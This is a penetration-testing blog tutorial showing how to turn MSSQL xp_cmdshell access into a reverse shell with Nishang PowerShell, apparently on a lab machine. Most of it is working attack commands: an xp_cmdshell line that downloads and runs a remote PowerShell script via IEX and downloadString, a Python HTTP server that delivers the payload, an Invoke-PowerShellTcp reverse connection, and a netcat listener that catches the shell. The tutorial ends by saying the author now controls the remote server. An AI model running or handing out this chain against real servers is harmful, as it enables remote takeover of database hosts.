MSSQL RCE and REVERSE SHELL XP_CMDSHELL with Nishang

Penentration Test One comment

Hi folks,

I am going to continue the tutorial from my previous post. In my previous post we have been able to activate the command execution from MSSQL using the xp_cmdshell function.

In this tutorial, we will talk about 3 things

1. Preparation of reverse shell script with Nishang powershell
2. Setup python http server for shell delivery
3. Setup nc server to get reverse connection

Let configure the first one. Basically nishang script is ready made powershell script for several purpose such as Backdooring, Escallation and etc. If you are kali linux user then you can find the script at below 

root@kali:~# ls -l /usr/share/nishang/
total 48
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility

Here below the steps to prepare the file

The next step is to prepare the delivery, To deliver the powershell that we have prepared is by creating download powershell script and execute it at the server by using xp_cmdshell. here is the full script

1> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.14.29/rev.ps1')"
2> go

The above script will download our nishang powershell from our machine (10.10.14.29) so that we need to create http server at our box.

python -m SimpleHTTPServer 80

The last step is to setup the nc server. This nc server will listen at the specified port which match to the one we defined in nishang 

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.29 -Port 8000

so we need to listen at port 8000

nc -nlvp 8000
Prepare everything

Here is the steps of reverse connection established

That is it .. all done, we are now connected and have control of remote server shell

One comment

  1. Pingback: Impacket-MSSQLClient Reverse shell – Cyber Security | Penetration Test | Malware Analysis

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s